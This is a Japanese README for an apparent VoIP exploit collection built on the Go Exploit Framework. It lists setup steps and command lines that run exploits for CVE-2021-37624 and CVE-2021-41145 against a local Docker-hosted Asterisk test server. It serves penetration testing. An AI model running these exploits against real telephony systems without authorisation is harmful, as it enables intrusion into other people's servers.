
さまざまなVoIP製品向けのエクスプロイト集。
開発中
さまざまな VoIP 製品向けのエクスプロイト集です。Go Exploit Framework に感謝します。
VoIP 向けのペネトレーションテストソリューションを探してここにたどり着いた場合は、Sippts(Kali の sippts-gui)または SIPVicious をチェックしてみてください。このプロジェクトは、よりエクスプロイト段階に焦点を当てています。
git clone https://github.com/jesusprubio/bluebox.git
cd bluebox
go mod tidy
go mod vendor
Go Exploit Framework が推奨するパターンに従っています。便宜上、バイナリはこのリポジトリに含まれていません。
go run cve-2021-37624/main.go -v -rhost 127.0.0.1
go run cve-2021-37624/main.go -fll DEBUG -v -c -e -rhost 127.0.0.1 -rport 5061 -transport tls -msg ey -user dembele
go run cve-2021-41145/main.go -v -c -e -rhost 127.0.0.1 -fhost rand
テスト対象の Asterisk サーバーを含む Docker Compose ファイルが用意されています。
task docker # Or `docker compose up -d`